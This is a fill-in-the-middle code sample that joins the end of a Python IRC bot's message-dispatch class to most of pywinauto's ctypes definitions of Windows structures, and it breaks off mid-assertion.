'msg': [], 'privmsg': [], 'chanmsg': [], 'notice': [], 'nick': [] } _process_thread = None def _async_process(self): while not self._stop_event.is_set(): time.sleep(0.01) try: args = self._in_queue.get_nowait() #These "msg"s will be raw irc received lines, which have several forms # basically, we should be looking for # :User!Name@host COMMAND <ARGS> userhost = user_re.search(args[0][1:]) if userhost: nick, host, user = userhost.groups() command = args[1] if command == 'JOIN': channel = args[2][1:] #JOIN Channels are : prefixed for handler in self._handlers['join']: handler(self, nick, host, channel) elif command == 'TOPIC': channel = args[2] topic = ' '.join(args[3:]) for handler in self._handlers['topic']: handler(self, nick, host, channel, topic) elif command == 'PART': channel = args[2] message = ' '.join(args[3:]) for handler in self._handlers['part']: handler(self, nick, host, channel, message) elif command == 'PRIVMSG': channel = args[2] message = ' '.join(args[3:])[1:] for handler in self._handlers['msg']: handler(self, nick, host, channel, message) if channel[0] == '#': #this is a channel for handler in self._handlers['chanmsg']: handler(self, nick, host, channel, message) else: #private message for handler in self._handlers['privmsg']: handler(self, nick, host, message) elif command == 'KICK': channel = args[2] kicked_nick = args[3] reason = ' '.join(args[4:])[1:] for handler in self._handlers['kick']: handler(self, nick, host, channel, kicked_nick, reason) elif command == 'NICK': new_nick = args[2][1:]<|fim▁hole|> for handler in self._handlers['nick']: handler(self, nick, new_nick, host) elif command == 'NOTICE': #:nick!user@host NOTICE <userchan> :message channel = args[2] message = ' '.join(args[3:]) for handler in self._handlers['notice']: handler(self, nick, host, channel, message) else: logger.warning("Unhandled command %s" % command) self._in_queue.task_done() except queue.Empty as e: pass except Exception as e: logger.exception("Error while handling message " + str(args)) def start(self): IRCClient.start(self) self._process_thread = threading.Thread(target=self._async_process) self._process_thread.start() def on(self, type): '''Decorator function''' def decorator(self, func): '''decorated functions should be written as class methods @on('join') def on_join(self, channel): print("Joined channel %s" % channel) ''' self._handlers[type].append(func) return func return decorator def on_join(self, func): self._handlers['join'].append(func) return func def on_part(self, func): self._handlers['part'].append(func) return func def on_kick(self, func): self._handlers['kick'].append(func) return func def on_msg(self, func): self._handlers['msg'].append(func) return func def on_privmsg(self, func): self._handlers['privmsg'].append(func) return func def on_chanmsg(self, func): self._handlers['chanmsg'].append(func) return func def on_notice(self, func): self._handlers['notice'].append(func) return func def on_nick(self, func): self._handlers['nick'].append(func) return func __all__ = ['IRCBot']<|fim▁end|>
<|file_name|>win32structures.py<|end_file_name|><|fim▁begin|># GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA "Definition of Windows structures" from __future__ import absolute_import __revision__ = "$Revision: 560 $" from .win32defines import LF_FACESIZE, NMTTDISPINFOW_V1_SIZE, HDITEMW_V1_SIZE import sys import ctypes from ctypes import \ c_int, c_uint, c_long, c_ulong, c_void_p, c_wchar, c_char, \ c_ubyte, c_ushort, c_wchar_p, \ POINTER, sizeof, alignment, Union, c_ulonglong, c_longlong, c_size_t def is_x64(): return sizeof(c_size_t) == 8 class Structure(ctypes.Structure): "Override the Structure class from ctypes to add printing and comparison" #---------------------------------------------------------------- def __str__(self): """Print out the fields of the ctypes Structure fields in exceptList will not be printed""" lines = [] for f in self._fields_: name = f[0] lines.append("%20s\t%s"% (name, getattr(self, name))) return "\n".join(lines) #---------------------------------------------------------------- def __eq__(self, other_struct): "return true if the two structures have the same coordinates" if isinstance(other_struct, ctypes.Structure): try: # pretend they are two structures - check that they both # have the same value for all fields are_equal = True for field in self._fields_: name = field[0] if getattr(self, name) != getattr(other_struct, name): are_equal = False break return are_equal except AttributeError: return False if isinstance(other_struct, (list, tuple)): # Now try to see if we have been passed in a list or tuple try: are_equal = True for i, field in enumerate(self._fields_): name = field[0] if getattr(self, name) != other_struct[i]: are_equal = False break return are_equal except: return False return False ##==================================================================== #def PrintCtypesStruct(struct, exceptList = []): # """Print out the fields of the ctypes Structure # # fields in exceptList will not be printed""" # for f in struct._fields_: # name = f[0] # if name in exceptList: # continue # print("%20s "% name, getattr(struct, name)) # allow ctypes structures to be pickled # set struct.__reduce__ = _reduce # e.g. RECT.__reduce__ = _reduce def _construct(typ, buf): #print "construct", (typ, buf) obj = typ.__new__(typ) ctypes.memmove(ctypes.addressof(obj), buf, len(buf)) return obj def _reduce(self): return (_construct, (self.__class__, str(buffer(self)))) #LPTTTOOLINFOW = POINTER(tagTOOLINFOW) #PTOOLINFOW = POINTER(tagTOOLINFOW) BOOL = c_int BYTE = c_ubyte CHAR = c_char DWORD = c_ulong HANDLE = c_void_p HBITMAP = c_long LONG = c_long LPVOID = c_void_p PVOID = c_void_p UINT = c_uint WCHAR = c_wchar WORD = c_ushort COLORREF = DWORD LPBYTE = POINTER(BYTE) LPWSTR = c_size_t #POINTER(WCHAR) DWORD_PTR = UINT_PTR = ULONG_PTR = c_size_t if is_x64(): INT_PTR = LONG_PTR = c_longlong else: INT_PTR = LONG_PTR = c_long HBITMAP = LONG_PTR #LONG HINSTANCE = LONG_PTR #LONG HMENU = LONG_PTR #LONG HBRUSH = LONG_PTR #LONG HTREEITEM = LONG_PTR #LONG HWND = LONG_PTR #LONG LPARAM = LONG_PTR WPARAM = UINT_PTR class POINT(Structure): _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/windef.h 307 ('x', LONG), ('y', LONG), ] assert sizeof(POINT) == 8, sizeof(POINT) assert alignment(POINT) == 4, alignment(POINT) #==================================================================== class RECT(Structure): "Wrap the RECT structure and add extra functionality" _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/windef.h 287 ('left', LONG), ('top', LONG), ('right', LONG), ('bottom', LONG), ] #---------------------------------------------------------------- def __init__(self, otherRect_or_left = 0, top = 0, right = 0, bottom = 0): """Provide a constructor for RECT structures A RECT can be constructed by: - Another RECT (each value will be copied) - Values for left, top, right and bottom e.g. my_rect = RECT(otherRect) or my_rect = RECT(10, 20, 34, 100) """ if isinstance(otherRect_or_left, RECT): self.left = otherRect_or_left.left self.right = otherRect_or_left.right self.top = otherRect_or_left.top self.bottom = otherRect_or_left.bottom else: #if not isinstance(otherRect_or_left, (int, long)): # print type(self), type(otherRect_or_left), otherRect_or_left if sys.version[0] == '3': self.left = otherRect_or_left self.right = right self.top = top self.bottom = bottom else: self.left = long(otherRect_or_left) self.right = long(right) self.top = long(top) self.bottom = long(bottom) # #---------------------------------------------------------------- # def __eq__(self, otherRect): # "return true if the two rectangles have the same coordinates" # # try: # return \ # self.left == otherRect.left and \ # self.top == otherRect.top and \ # self.right == otherRect.right and \ # self.bottom == otherRect.bottom # except AttributeError: # return False #---------------------------------------------------------------- def __str__(self): "Return a string representation of the RECT" return "(L%d, T%d, R%d, B%d)" % ( self.left, self.top, self.right, self.bottom) #---------------------------------------------------------------- def __repr__(self): "Return some representation of the RECT" return "<RECT L%d, T%d, R%d, B%d>" % ( self.left, self.top, self.right, self.bottom) #---------------------------------------------------------------- def __sub__(self, other): "Return a new rectangle which is offset from the one passed in" newRect = RECT() newRect.left = self.left - other.left newRect.right = self.right - other.left newRect.top = self.top - other.top newRect.bottom = self.bottom - other.top return newRect #---------------------------------------------------------------- def __add__(self, other): "Allow two rects to be added using +" newRect = RECT() newRect.left = self.left + other.left newRect.right = self.right + other.left newRect.top = self.top + other.top newRect.bottom = self.bottom + other.top return newRect #---------------------------------------------------------------- def width(self): "Return the width of the rect" return self.right - self.left #---------------------------------------------------------------- def height(self): "Return the height of the rect" return self.bottom - self.top #---------------------------------------------------------------- def mid_point(self): "Return a POINT structure representing the mid point" pt = POINT() pt.x = int(self.left + self.width()/2) pt.y = int(self.top + self.height()/2) return pt #def __hash__(self): # return hash (self.left, self.top, self.right, self.bottom) RECT.__reduce__ = _reduce assert sizeof(RECT) == 16, sizeof(RECT) assert alignment(RECT) == 4, alignment(RECT) class LVCOLUMNW(Structure): _pack_ = 1 _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 2982 ('mask', UINT), ('fmt', c_int), ('cx', c_int), ('pszText', c_long), #LPWSTR), ('cchTextMax', c_int), ('iSubItem', c_int), ('iImage', c_int), ('iOrder', c_int), ] class LVITEMW(Structure): _pack_ = 1 _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 2679 ('mask', UINT), ('iItem', c_int), ('iSubItem', c_int), ('state', UINT), ('stateMask', UINT), ('pszText', c_long), #LPWSTR), ('cchTextMax', c_int), ('iImage', c_int), ('lParam', LPARAM), ('iIndent', c_int), ] if is_x64(): assert sizeof(LVITEMW) == 44, sizeof(LVITEMW) assert alignment(LVITEMW) == 1, alignment(LVITEMW) else: assert sizeof(LVITEMW) == 40, sizeof(LVITEMW) assert alignment(LVITEMW) == 1, alignment(LVITEMW) class TVITEMW(Structure): #_pack_ = 1 _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 3755 ('mask', UINT), ('hItem', HTREEITEM), ('state', UINT), ('stateMask', UINT), ('pszText', LPWSTR), #, c_long), ('cchTextMax', c_int), ('iImage', c_int), ('iSelectedImage', c_int), ('cChildren', c_int), ('lParam', LPARAM), ] if is_x64(): assert sizeof(TVITEMW) == 56, sizeof(TVITEMW) assert alignment(TVITEMW) == 8, alignment(TVITEMW) else: assert sizeof(TVITEMW) == 40, sizeof(TVITEMW) assert alignment(TVITEMW) == 4, alignment(TVITEMW) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 2225 class NMHDR(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 2225 ('hwndFrom', HWND), ('idFrom', UINT_PTR), ('code', UINT), ] if is_x64(): assert sizeof(NMHDR) == 24, sizeof(NMHDR) assert alignment(NMHDR) == 8, alignment(NMHDR) else: <|fim▁hole|> # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4275 class NMTVDISPINFOW(Structure): _pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4275 ('hdr', NMHDR), ('item', TVITEMW), ] #assert sizeof(NMTVDISPINFOW) == 52, sizeof(NMTVDISPINFOW) assert alignment(NMTVDISPINFOW) == 1, alignment(NMTVDISPINFOW) class LOGFONTW(Structure): _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/wingdi.h 1090 ('lfHeight', LONG), ('lfWidth', LONG), ('lfEscapement', LONG), ('lfOrientation', LONG), ('lfWeight', LONG), ('lfItalic', BYTE), ('lfUnderline', BYTE), ('lfStrikeOut', BYTE), ('lfCharSet', BYTE), ('lfOutPrecision', BYTE), ('lfClipPrecision', BYTE), ('lfQuality', BYTE), ('lfPitchAndFamily', BYTE), ('lfFaceName', WCHAR * LF_FACESIZE), ] #---------------------------------------------------------------- def __str__(self): return "('%s' %d)" % (self.lfFaceName, self.lfHeight) #---------------------------------------------------------------- def __repr__(self): return "<LOGFONTW '%s' %d>" % (self.lfFaceName, self.lfHeight) LOGFONTW.__reduce__ = _reduce assert sizeof(LOGFONTW) == 92, sizeof(LOGFONTW) assert alignment(LOGFONTW) == 4, alignment(LOGFONTW) class TEXTMETRICW(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/wingdi.h 878 ('tmHeight', LONG), ('tmAscent', LONG), ('tmDescent', LONG), ('tmInternalLeading', LONG), ('tmExternalLeading', LONG), ('tmAveCharWidth', LONG), ('tmMaxCharWidth', LONG), ('tmWeight', LONG), ('tmOverhang', LONG), ('tmDigitizedAspectX', LONG), ('tmDigitizedAspectY', LONG), ('tmFirstChar', WCHAR), ('tmLastChar', WCHAR), ('tmDefaultChar', WCHAR), ('tmBreakChar', WCHAR), ('tmItalic', BYTE), ('tmUnderlined', BYTE), ('tmStruckOut', BYTE), ('tmPitchAndFamily', BYTE), ('tmCharSet', BYTE), ] assert sizeof(TEXTMETRICW) == 58, sizeof(TEXTMETRICW) assert alignment(TEXTMETRICW) == 2, alignment(TEXTMETRICW) class NONCLIENTMETRICSW(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/winuser.h 8767 ('cbSize', UINT), ('iBorderWidth', c_int), ('iScrollWidth', c_int), ('iScrollHeight', c_int), ('iCaptionWidth', c_int), ('iCaptionHeight', c_int), ('lfCaptionFont', LOGFONTW), ('iSmCaptionWidth', c_int), ('iSmCaptionHeight', c_int), ('lfSmCaptionFont', LOGFONTW), ('iMenuWidth', c_int), ('iMenuHeight', c_int), ('lfMenuFont', LOGFONTW), ('lfStatusFont', LOGFONTW), ('lfMessageFont', LOGFONTW), ] assert sizeof(NONCLIENTMETRICSW) == 500, sizeof(NONCLIENTMETRICSW) assert alignment(NONCLIENTMETRICSW) == 2, alignment(NONCLIENTMETRICSW) # C:/PROGRA~1/MIAF9D~1/VC98/Include/wingdi.h 1025 class LOGBRUSH(Structure): _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/wingdi.h 1025 ('lbStyle', UINT), ('lbColor', COLORREF), ('lbHatch', LONG), ] assert sizeof(LOGBRUSH) == 12, sizeof(LOGBRUSH) assert alignment(LOGBRUSH) == 4, alignment(LOGBRUSH) # C:/PROGRA~1/MIAF9D~1/VC98/Include/winuser.h 5147 class MENUITEMINFOW(Structure): _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/winuser.h 5147 ('cbSize', UINT), ('fMask', UINT), ('fType', UINT), ('fState', UINT), ('wID', UINT), ('hSubMenu', HMENU), ('hbmpChecked', HBITMAP), ('hbmpUnchecked', HBITMAP), ('dwItemData', ULONG_PTR), #DWORD), ('dwTypeData', LPWSTR), ('cch', UINT), ('hbmpItem', HBITMAP), ] if is_x64(): assert sizeof(MENUITEMINFOW) == 80, sizeof(MENUITEMINFOW) assert alignment(MENUITEMINFOW) == 8, alignment(MENUITEMINFOW) else: assert sizeof(MENUITEMINFOW) == 48, sizeof(MENUITEMINFOW) assert alignment(MENUITEMINFOW) == 4, alignment(MENUITEMINFOW) class MENUBARINFO(Structure): _fields_ = [ ('cbSize', DWORD), ('rcBar', RECT), # rect of bar, popup, item ('hMenu', HMENU), # real menu handle of bar, popup ('hwndMenu', HWND), # hwnd of item submenu if one ('fBarFocused', BOOL, 1), # bar, popup has the focus ('fFocused', BOOL, 1), # item has the focus ] class MSG(Structure): _fields_ = [ # C:/PROGRA~1/MIAF9D~1/VC98/Include/winuser.h 1226 ('hwnd', HWND), ('message', UINT), ('wParam', WPARAM), ('lParam', LPARAM), ('time', DWORD), ('pt', POINT), ] if is_x64(): assert sizeof(MSG) == 48, sizeof(MSG) assert alignment(MSG) == 8, alignment(MSG) else: assert sizeof(MSG) == 28, sizeof(MSG) assert alignment(MSG) == 4, alignment(MSG) # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 1865 class TOOLINFOW(Structure): _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 1865 ('cbSize', UINT), ('uFlags', UINT), ('hwnd', HWND), ('uId', UINT_PTR), ('rect', RECT), ('hinst', HINSTANCE), ('lpszText', LPWSTR), #c_long), ('lParam', LPARAM), ('lpReserved', LPVOID) ] if is_x64(): assert sizeof(TOOLINFOW) == 72, sizeof(TOOLINFOW) assert alignment(TOOLINFOW) == 8, alignment(TOOLINFOW) else: assert sizeof(TOOLINFOW) == 48, sizeof(TOOLINFOW) assert alignment(TOOLINFOW) == 4, alignment(TOOLINFOW) # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 2068 class NMTTDISPINFOW(Structure): _pack_ = 1 _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 2068 ('hdr', NMHDR), ('lpszText', LPWSTR), ('szText', WCHAR * 80), ('hinst', HINSTANCE), ('uFlags', UINT), ('lParam', LPARAM), ] if is_x64(): sizeof(NMTTDISPINFOW) == 212, sizeof(NMTTDISPINFOW) else: assert sizeof(NMTTDISPINFOW) == 188, sizeof(NMTTDISPINFOW) assert alignment(NMTTDISPINFOW) == 1, alignment(NMTTDISPINFOW) class HDITEMW(Structure): _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 617 ('mask', UINT), ('cxy', c_int), ('pszText', LPWSTR), #c_long), ('hbm', HBITMAP), ('cchTextMax', c_int), ('fmt', c_int), ('lParam', LPARAM), ('iImage', c_int), ('iOrder', c_int), ('type', UINT), ('pvFilter', LPVOID), ('state', UINT) ] if is_x64(): assert sizeof(HDITEMW) == 72, sizeof(HDITEMW) assert alignment(HDITEMW) == 8, alignment(HDITEMW) else: assert sizeof(HDITEMW) == 48, sizeof(HDITEMW) assert alignment(HDITEMW) == 4, alignment(HDITEMW) # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 4456 class COMBOBOXEXITEMW(Structure): #_pack_ = 1 _fields_ = [ # C:/_tools/Python24/Lib/site-packages/ctypes/wrap/test/commctrl.h 4456 ('mask', UINT), ('iItem', INT_PTR), ('pszText', LPWSTR), #c_long), ('cchTextMax', c_int), ('iImage', c_int), ('iSelectedImage', c_int), ('iOverlay', c_int), ('iIndent', c_int), ('lParam', LPARAM), ] if is_x64(): assert sizeof(COMBOBOXEXITEMW) == 56, sizeof(COMBOBOXEXITEMW) assert alignment(COMBOBOXEXITEMW) == 8, alignment(COMBOBOXEXITEMW) else: assert sizeof(COMBOBOXEXITEMW) == 36, sizeof(COMBOBOXEXITEMW) assert alignment(COMBOBOXEXITEMW) == 4, alignment(COMBOBOXEXITEMW) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4757 class TCITEMHEADERW(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4757 ('mask', UINT), ('lpReserved1', UINT), ('lpReserved2', UINT), ('pszText', LPWSTR), ('cchTextMax', c_int), ('iImage', c_int), ] if is_x64(): assert sizeof(TCITEMHEADERW) == 32, sizeof(TCITEMHEADERW) assert alignment(TCITEMHEADERW) == 8, alignment(TCITEMHEADERW) else: assert sizeof(TCITEMHEADERW) == 24, sizeof(TCITEMHEADERW) assert alignment(TCITEMHEADERW) == 4, alignment(TCITEMHEADERW) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4804 class TCITEMW(Structure): #if is_x64(): # _pack_ = 8 #else: # _pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4804 ('mask', UINT), ('dwState', DWORD), ('dwStateMask', DWORD), ('pszText', LPWSTR), #c_long), #LPWSTR), ('cchTextMax', c_int), ('iImage', c_int), ('lParam', LPARAM), ] if is_x64(): assert sizeof(TCITEMW) == 40, sizeof(TCITEMW) assert alignment(TCITEMW) == 8, alignment(TCITEMW) else: assert sizeof(TCITEMW) == 28, sizeof(TCITEMW) assert alignment(TCITEMW) == 4, alignment(TCITEMW) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 1308 class TBBUTTONINFOW(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 1308 ('cbSize', UINT), ('dwMask', DWORD), ('idCommand', c_int), ('iImage', c_int), ('fsState', BYTE), ('fsStyle', BYTE), ('cx', WORD), ('lParam', POINTER(DWORD)), ('pszText', LPWSTR), ('cchText', c_int), ] if is_x64(): assert sizeof(TBBUTTONINFOW) == 48, sizeof(TBBUTTONINFOW) assert alignment(TBBUTTONINFOW) == 8, alignment(TBBUTTONINFOW) else: assert sizeof(TBBUTTONINFOW) == 32, sizeof(TBBUTTONINFOW) assert alignment(TBBUTTONINFOW) == 4, alignment(TBBUTTONINFOW) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 953 class TBBUTTON(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 953 ('iBitmap', c_int), ('idCommand', c_int), ('fsState', BYTE), ('fsStyle', BYTE), ('bReserved', BYTE * 2), ('dwData', DWORD_PTR), ('iString', INT_PTR), ] if is_x64(): assert sizeof(TBBUTTON) == 32, sizeof(TBBUTTON) assert alignment(TBBUTTON) == 8, alignment(TBBUTTON) else: assert sizeof(TBBUTTON) == 20, sizeof(TBBUTTON) assert alignment(TBBUTTON) == 4, alignment(TBBUTTON) class REBARBANDINFOW(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 1636 ('cbSize', UINT), ('fMask', UINT), ('fStyle', UINT), ('clrFore', COLORREF), ('clrBack', COLORREF), ('lpText', LPWSTR), ('cch', UINT), ('iImage', c_int), ('hwndChild', HWND), ('cxMinChild', UINT), ('cyMinChild', UINT), ('cx', UINT), ('hbmBack', HBITMAP), ('wID', UINT), ('cyChild', UINT), ('cyMaxChild', UINT), ('cyIntegral', UINT), ('cxIdeal', UINT), ('lParam', LPARAM), ('cxHeader', UINT), #('rcChevronLocation', RECT), # the rect is in client co-ord wrt hwndChild #('uChevronState', UINT) ] if is_x64(): assert sizeof(REBARBANDINFOW) == 112, sizeof(REBARBANDINFOW) #128 assert alignment(REBARBANDINFOW) == 8, alignment(REBARBANDINFOW) else: assert sizeof(REBARBANDINFOW) == 80, sizeof(REBARBANDINFOW) #100 assert alignment(REBARBANDINFOW) == 4, alignment(REBARBANDINFOW) # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 223 class SECURITY_ATTRIBUTES(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 223 ('nLength', DWORD), ('lpSecurityDescriptor', LPVOID), ('bInheritHandle', BOOL), ] assert sizeof(SECURITY_ATTRIBUTES) == 12 or sizeof(SECURITY_ATTRIBUTES) == 24, sizeof(SECURITY_ATTRIBUTES) assert alignment(SECURITY_ATTRIBUTES) == 4 or alignment(SECURITY_ATTRIBUTES) == 8, alignment(SECURITY_ATTRIBUTES) # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 3794 class STARTUPINFOW(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 3794 ('cb', DWORD), ('lpReserved', LPWSTR), ('lpDesktop', LPWSTR), ('lpTitle', LPWSTR), ('dwX', DWORD), ('dwY', DWORD), ('dwXSize', DWORD), ('dwYSize', DWORD), ('dwXCountChars', DWORD), ('dwYCountChars', DWORD), ('dwFillAttribute', DWORD), ('dwFlags', DWORD), ('wShowWindow', WORD), ('cbReserved2', WORD), ('lpReserved2', LPBYTE), ('hStdInput', HANDLE), ('hStdOutput', HANDLE), ('hStdError', HANDLE), ] assert sizeof(STARTUPINFOW) == 68 or sizeof(STARTUPINFOW) == 104, sizeof(STARTUPINFOW) assert alignment(STARTUPINFOW) == 4 or alignment(STARTUPINFOW) == 8, alignment(STARTUPINFOW) # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 229 class PROCESS_INFORMATION(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winbase.h 229 ('hProcess', HANDLE), ('hThread', HANDLE), ('dwProcessId', DWORD), ('dwThreadId', DWORD), ] assert sizeof(PROCESS_INFORMATION) == 16 or sizeof(PROCESS_INFORMATION) == 24, sizeof(PROCESS_INFORMATION) assert alignment(PROCESS_INFORMATION) == 4 or alignment(PROCESS_INFORMATION) == 8, alignment(PROCESS_INFORMATION) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 3417 class NMLISTVIEW(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 3417 ('hdr', NMHDR), ('iItem', c_int), ('iSubItem', c_int), ('uNewState', UINT), ('uOldState', UINT), ('uChanged', UINT), ('ptAction', POINT), ('lParam', LPARAM), ] if is_x64(): assert sizeof(NMLISTVIEW) == 64, sizeof(NMLISTVIEW) assert alignment(NMLISTVIEW) == 8, alignment(NMLISTVIEW) else: assert sizeof(NMLISTVIEW) == 44, sizeof(NMLISTVIEW) assert alignment(NMLISTVIEW) == 4, alignment(NMLISTVIEW) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 235 class NMMOUSE(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 235 ('hdr', NMHDR), ('dwItemSpec', DWORD_PTR), ('dwItemData', DWORD_PTR), ('pt', POINT), ('dwHitInfo', LPARAM), ] if is_x64(): assert sizeof(NMMOUSE) == 56, sizeof(NMMOUSE) assert alignment(NMMOUSE) == 8, alignment(NMMOUSE) else: assert sizeof(NMMOUSE) == 32, sizeof(NMMOUSE) assert alignment(NMMOUSE) == 4, alignment(NMMOUSE) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4283 class MOUSEINPUT(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4283 ('dx', LONG), ('dy', LONG), ('mouseData', DWORD), ('dwFlags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD), ] assert sizeof(MOUSEINPUT) == 24, sizeof(MOUSEINPUT) assert alignment(MOUSEINPUT) == 2, alignment(MOUSEINPUT) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4292 class KEYBDINPUT(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4292 ('wVk', WORD), ('wScan', WORD), ('dwFlags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD), ] assert sizeof(KEYBDINPUT) == 16, sizeof(KEYBDINPUT) assert alignment(KEYBDINPUT) == 2, alignment(KEYBDINPUT) class HARDWAREINPUT(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4300 ('uMsg', DWORD), ('wParamL', WORD), ('wParamH', WORD), ] assert sizeof(HARDWAREINPUT) == 8, sizeof(HARDWAREINPUT) assert alignment(HARDWAREINPUT) == 2, alignment(HARDWAREINPUT) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4314 class UNION_INPUT_STRUCTS(Union): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4314 ('mi', MOUSEINPUT), ('ki', KEYBDINPUT), ('hi', HARDWAREINPUT), ] assert sizeof(UNION_INPUT_STRUCTS) == 24, sizeof(UNION_INPUT_STRUCTS) assert alignment(UNION_INPUT_STRUCTS) == 2, alignment(UNION_INPUT_STRUCTS) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4310 class INPUT(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 4310 ('type', DWORD), # Unnamed field renamed to '_' ('_', UNION_INPUT_STRUCTS), ] assert sizeof(INPUT) == 28, sizeof(INPUT) assert alignment(INPUT) == 2, alignment(INPUT) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 2415 class NMUPDOWN(Structure): _pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 2415 ('hdr', NMHDR), ('iPos', c_int), ('iDelta', c_int), ] if is_x64(): assert sizeof(NMUPDOWN) == 32, sizeof(NMUPDOWN) assert alignment(NMUPDOWN) == 1, alignment(NMUPDOWN) else: assert sizeof(NMUPDOWN) == 20, sizeof(NMUPDOWN) assert alignment(NMUPDOWN) == 1, alignment(NMUPDOWN) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 9821 class GUITHREADINFO(Structure): _pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 9821 ('cbSize', DWORD), ('flags', DWORD), ('hwndActive', HWND), ('hwndFocus', HWND), ('hwndCapture', HWND), ('hwndMenuOwner', HWND), ('hwndMoveSize', HWND), ('hwndCaret', HWND), ('rcCaret', RECT), ] if is_x64(): assert sizeof(GUITHREADINFO) == 72, sizeof(GUITHREADINFO) assert alignment(GUITHREADINFO) == 2, alignment(GUITHREADINFO) else: assert sizeof(GUITHREADINFO) == 48, sizeof(GUITHREADINFO) assert alignment(GUITHREADINFO) == 2, alignment(GUITHREADINFO) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 5043 class MENUINFO(Structure): #_pack_ = 2 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 5043 ('cbSize', DWORD), ('fMask', DWORD), ('dwStyle', DWORD), ('cyMax', UINT), ('hbrBack', HBRUSH), ('dwContextHelpID', DWORD), ('dwMenuData', ULONG_PTR), ] if is_x64(): assert sizeof(MENUINFO) == 40, sizeof(MENUINFO) assert alignment(MENUINFO) == 8, alignment(MENUINFO) else: assert sizeof(MENUINFO) == 28, sizeof(MENUINFO) assert alignment(MENUINFO) == 4, alignment(MENUINFO) NMTTDISPINFOW_V1_SIZE = 184 # Variable c_uint # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 2066 class NMTTDISPINFOW(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 2066 ('hdr', NMHDR), ('lpszText', LPWSTR), ('szText', WCHAR * 80), ('hinst', HINSTANCE), ('uFlags', UINT), ('lParam', LPARAM), ] if is_x64(): assert sizeof(NMTTDISPINFOW) == 216, sizeof(NMTTDISPINFOW) assert alignment(NMTTDISPINFOW) == 8, 